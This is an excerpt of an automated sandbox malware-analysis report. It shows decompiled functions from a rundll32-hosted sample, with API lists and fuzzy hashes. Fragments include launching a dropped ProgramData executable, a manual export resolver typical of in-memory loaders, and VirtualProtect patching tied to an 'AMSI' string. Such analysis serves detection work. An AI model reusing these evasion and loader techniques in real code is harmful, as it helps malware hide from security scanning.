    • SetLastError.KERNEL32(0000007F), ref: 01181507
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 2b64351a07898a03ac884c32759aa303be9b89b52cd85c7a48e500c92c3ebc65
    • Instruction ID: 6e965b40331f70658bbea86a50e74c44ef16665140c7d4360a8728037774d428
    • Opcode Fuzzy Hash: 2b64351a07898a03ac884c32759aa303be9b89b52cd85c7a48e500c92c3ebc65
    • Instruction Fuzzy Hash: 1E71D875E10109EFCB08EF98C590AADB7B2FF48304F648598D456AB345D774EA82CFA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B12B0, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 55COMMON
    Download Yara Rule
    C-Code - Quality: 25%
    			E011B12B0() {
				signed int _v8;
				void _v40;
				void* _v52;
				void* _v56;
				char _v124;
				int _t23;
				void* _t32;
				void* _t37;
				signed int _t40;

				_v8 =  *0x11b3004 ^ _t40;
				 *0x11b3028( &_v124, 0, 0x44, _t32, _t37);
				 *0x11b3028( &_v56, 0, 0x10);
				_v124 = 0x44;
				memcpy( &_v40, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);
				asm("movsw");
				asm("movsb");
				 *0x11b3018( &_v40, 0, 0, 0, 0, 0, 0, "C:\\",  &_v124,  &_v56);
				CloseHandle(_v56);
				_t23 = CloseHandle(_v52);
				E011B1A04();
				return _t23;
			}












    0x011b12bd
    0x011b12ca
    0x011b12db
    0x011b12e4
    0x011b12f8
    0x011b12fa
    0x011b12fc
    0x011b131a
    0x011b1324
    0x011b132e
    0x011b133b
    0x011b1343

    APIs
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.703509486.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 0000000A.00000002.703497080.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID: C:\$C:\ProgramData\huqvg\huqvg.exe$C:\ProgramData\huqvg\huqvg.exe$D
    • API String ID: 2962429428-1049507935
    • Opcode ID: 2ae4637f4ceda772a28da5a89def28bec0bda3bd989d888adb9bc1e8e0ed4637
    • Instruction ID: 0ba15bc034bb2bf40361cee484e988d333a5fffb60e72774cab2eac3bb5708de
    • Opcode Fuzzy Hash: 2ae4637f4ceda772a28da5a89def28bec0bda3bd989d888adb9bc1e8e0ed4637
    • Instruction Fuzzy Hash: D2018471A14208BBDB28EBA4D989FDE7779FF4C704F100428FA15A7180D7757A58CB51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011825E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56librarymemoryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryExA.KERNEL32(01184070,00000000,00000800), ref: 011825F9
    • GetProcAddress.KERNEL32(00000000,01184078), ref: 01182615
    • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 01182650
    • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 01182671
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual$AddressLibraryLoadProc
    • String ID: AMSI
    • API String ID: 3300690313-3828877684
    • Opcode ID: fb821300e382cbd3378ac708d6e4a720a16f6652a9227e8b8d433512c88c85f3
    • Instruction ID: 9ad89c5d88709a6a05f0e7b48afd091b6f21672bc4781ccd8e52743aa710d394
    • Opcode Fuzzy Hash: fb821300e382cbd3378ac708d6e4a720a16f6652a9227e8b8d433512c88c85f3
    • Instruction Fuzzy Hash: 92111CB4E00209EFCB19DFD4C849BAEBBB4FB48704F208559EA1167340D7B4AA45CF55
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01191FA0, Relevance: 6.4, APIs: 5, Instructions: 121COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E01191FA0(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed short* _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _t82;
				void* _t124;

				_v40 = __ecx;
				_t3 = _a4 + 4; // 0x3
				_v12 =  *_t3;
				_v16 = 0;
				_v32 =  *_a4 + 0x78;
				if( *((intOrPtr*)(_v32 + 4)) != 0) {
					_v8 = _v12 +  *_v32;
					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0xffff) != 0) {
							_v24 = _v12 +  *((intOrPtr*)(_v8 + 0x20));
							_v28 = _v12 +  *((intOrPtr*)(_v8 + 0x24));
							_v36 = 0;
							_v20 = 0;
							while(_v20 <  *((intOrPtr*)(_v8 + 0x18))) {
								_t82 = E011911E0(_a8, _v12 +  *_v24);
								_t124 = _t124 + 8;
								if(_t82 != 0) {
									_v20 = _v20 + 1;
									_v24 = _v24 + 4;
									_v28 =  &(_v28[1]);
									continue;
								}
								_v16 =  *_v28 & 0x0000ffff;
								_v36 = 1;
								break;
							}
							if(_v36 != 0) {
								L17:
								if(_v16 <=  *((intOrPtr*)(_v8 + 0x14))) {
									return _v12 +  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_v8 + 0x1c)) + _v16 * 4));
								}
								SetLastError(0x7f);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v16 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L17;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}














    0x01191fa6
    0x01191fac
    0x01191faf
    0x01191fb2
    0x01191fca
    0x01191fd4
    0x01191fed
    0x01191ff7
    0x01192004
    0x00000000
    0x01192011
    0x01192021
    0x01192069
    0x01192075
    0x01192078
    0x0119207f
    0x011920a3
    0x011920bb
    0x011920c0
    0x011920c5
    0x0119208e
    0x01192097
    0x011920a0
    0x00000000
    0x011920a0
    0x011920cd
    0x011920d0
    0x00000000
    0x011920d0
    0x011920df
    0x011920ed
    0x011920f6
    0x00000000
    0x01192113
    0x011920fa
    0x00000000
    0x01192100
    0x011920e3
    0x00000000
    0x011920e9
    0x01192035
    0x01192058
    0x00000000
    0x01192058
    0x01192039
    0x00000000
    0x0119203f
    0x01191ff7
    0x01191fd8
    0x00000000

    APIs
    • SetLastError.KERNEL32(0000007F,?,?,?,?,01191039,00000000), ref: 01191FD8
    • SetLastError.KERNEL32(0000007F,?,?,?,?,01191039,00000000), ref: 01192004
    Memory Dump Source
    • Source File: 0000000A.00000002.703440159.0000000001191000.00000020.00000001.sdmp, Offset: 01190000, based on PE: true
    • Associated: 0000000A.00000002.703430993.0000000001190000.00000004.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703449710.0000000001193000.00000002.00000001.sdmp Download File
    • Associated: 0000000A.00000002.703458852.0000000001194000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1190000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 51582c3cdb4d9d18e3c3b966280abcaaf8039ca54f8e33399929ae064e118ed4
    • Instruction ID: 9305394e66a3e7f7c766ad249c40856952fb4e9a5b03cf131201ca77269a1dbc
    • Opcode Fuzzy Hash: 51582c3cdb4d9d18e3c3b966280abcaaf8039ca54f8e33399929ae064e118ed4
    • Instruction Fuzzy Hash: 9151FA74A0010AEFDF18CF98C581BAEBBB2FF48304F248169D525AB345D735EA91CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01182430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 01182468
    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 011824B2
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.703390841.0000000001181000.00000020.00000001.sdmp, Offset: 01181000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_1181000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID: @
    • API String ID: 544645111-2766056989
    • Opcode ID: 5f6fbaf245827d826662a090f3b9b8f553eaea5ed9bbfe0413b36b76f2cc1cc8
    • Instruction ID: 9a76771112f446554f9c85e8598d973e0e3de8fe2b7e066cf6f3d18df6761471
    • Opcode Fuzzy Hash: 5f6fbaf245827d826662a090f3b9b8f553eaea5ed9bbfe0413b36b76f2cc1cc8
    • Instruction Fuzzy Hash: 512118B4A04208EFDF19DF98C880BADBBB5BF44304F24C199D906AB245C374AB80DF61
    Uniqueness

    Uniqueness Score: -1.00%